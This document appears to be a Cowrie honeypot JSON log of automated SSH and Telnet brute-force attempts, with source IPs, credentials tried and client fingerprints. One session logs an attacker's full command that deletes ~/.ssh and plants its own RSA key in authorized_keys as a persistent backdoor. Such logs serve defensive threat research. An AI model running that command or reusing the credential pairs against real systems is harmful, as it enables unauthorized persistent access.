{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:58.463225Z","src_ip":"212.227.235.229","session":"47805dfac3d7"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":55952,"dst_ip":"1.2.3.4","dst_port":23,"session":"18616102895d","protocol":"telnet","message":"New connection: 8.222.212.69:55952 (1.2.3.4:23) [session: 18616102895d]","sensor":"my-vps","timestamp":"2025-08-28T06:40:04.846009Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48172,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a31ef05f438","protocol":"ssh","message":"New connection: 212.227.125.160:48172 (1.2.3.4:22) [session: 1a31ef05f438]","sensor":"my-vps","timestamp":"2025-08-28T06:40:06.140146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:06.141716Z","src_ip":"212.227.125.160","session":"1a31ef05f438"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:40:06.369282Z","src_ip":"212.227.125.160","session":"1a31ef05f438"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T06:40:07.040981Z","src_ip":"212.227.125.160","session":"1a31ef05f438"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:08.265676Z","src_ip":"212.227.125.160","session":"1a31ef05f438"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36002,"dst_ip":"1.2.3.4","dst_port":22,"session":"d700b9e9f4b3","protocol":"ssh","message":"New connection: 212.227.235.229:36002 (1.2.3.4:22) [session: d700b9e9f4b3]","sensor":"my-vps","timestamp":"2025-08-28T06:40:12.668708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:12.669624Z","src_ip":"212.227.235.229","session":"d700b9e9f4b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:40:12.923961Z","src_ip":"212.227.235.229","session":"d700b9e9f4b3"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T06:40:13.689191Z","src_ip":"212.227.235.229","session":"d700b9e9f4b3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:14.945631Z","src_ip":"212.227.235.229","session":"d700b9e9f4b3"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.66.30","src_port":39414,"dst_ip":"1.2.3.4","dst_port":22,"session":"5af72d2dc9f0","protocol":"ssh","message":"New connection: 101.126.66.30:39414 (1.2.3.4:22) [session: 5af72d2dc9f0]","sensor":"my-vps","timestamp":"2025-08-28T06:40:17.581212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:40:17.581892Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:40:17.798929Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.login.success","username":"root","password":"123456Dr","message":"login attempt [root/123456Dr] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:40:20.649644Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:40:21.164894Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:40:21.165566Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:40:21.166372Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:21.386430Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:40:21.844442Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:40:21.845215Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.065884Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.066768Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46054,"dst_ip":"1.2.3.4","dst_port":22,"session":"5361191e0f5c","protocol":"ssh","message":"New connection: 212.227.125.160:46054 (1.2.3.4:22) [session: 5361191e0f5c]","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.202909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.203776Z","src_ip":"212.227.125.160","session":"5361191e0f5c"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.66.30","src_port":39428,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e17db32ce1a","protocol":"ssh","message":"New connection: 101.126.66.30:39428 (1.2.3.4:22) [session: 8e17db32ce1a]","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.283715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.285565Z","src_ip":"101.126.66.30","session":"8e17db32ce1a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.422853Z","src_ip":"212.227.125.160","session":"5361191e0f5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:40:22.495430Z","src_ip":"101.126.66.30","session":"8e17db32ce1a"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:40:23.081566Z","src_ip":"212.227.125.160","session":"5361191e0f5c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:40:23.379539Z","src_ip":"101.126.66.30","session":"8e17db32ce1a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:24.303291Z","src_ip":"212.227.125.160","session":"5361191e0f5c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:25.129594Z","src_ip":"101.126.66.30","session":"8e17db32ce1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40850,"dst_ip":"1.2.3.4","dst_port":22,"session":"9df583238781","protocol":"ssh","message":"New connection: 212.227.125.160:40850 (1.2.3.4:22) [session: 9df583238781]","sensor":"my-vps","timestamp":"2025-08-28T06:40:26.440191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:26.440995Z","src_ip":"212.227.125.160","session":"9df583238781"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:40:26.667825Z","src_ip":"212.227.125.160","session":"9df583238781"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:40:27.349795Z","src_ip":"212.227.125.160","session":"9df583238781"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.66.30","src_port":53668,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fdefe2ba813","protocol":"ssh","message":"New connection: 101.126.66.30:53668 (1.2.3.4:22) [session: 7fdefe2ba813]","sensor":"my-vps","timestamp":"2025-08-28T06:40:27.366719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:40:27.367565Z","src_ip":"101.126.66.30","session":"7fdefe2ba813"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:27.577688Z","src_ip":"212.227.125.160","session":"9df583238781"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:40:28.198902Z","src_ip":"101.126.66.30","session":"7fdefe2ba813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40306,"dst_ip":"1.2.3.4","dst_port":22,"session":"357fd22e20d2","protocol":"ssh","message":"New connection: 212.227.235.229:40306 (1.2.3.4:22) [session: 357fd22e20d2]","sensor":"my-vps","timestamp":"2025-08-28T06:40:28.848019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:28.848975Z","src_ip":"212.227.235.229","session":"357fd22e20d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:40:29.109686Z","src_ip":"212.227.235.229","session":"357fd22e20d2"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:40:29.894089Z","src_ip":"212.227.235.229","session":"357fd22e20d2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:31.156494Z","src_ip":"212.227.235.229","session":"357fd22e20d2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:40:31.578797Z","src_ip":"101.126.66.30","session":"7fdefe2ba813"}
{"eventid":"cowrie.session.closed","duration":"14.7","message":"Connection lost after 14.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:32.297093Z","src_ip":"101.126.66.30","session":"5af72d2dc9f0"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:32.298193Z","src_ip":"101.126.66.30","session":"7fdefe2ba813"}
{"eventid":"cowrie.session.closed","duration":31.119379997253418,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:35.965319Z","src_ip":"8.222.212.69","session":"18616102895d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46616,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ed7253ac6e","protocol":"ssh","message":"New connection: 212.227.125.160:46616 (1.2.3.4:22) [session: 49ed7253ac6e]","sensor":"my-vps","timestamp":"2025-08-28T06:40:38.593207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:38.595337Z","src_ip":"212.227.125.160","session":"49ed7253ac6e"}
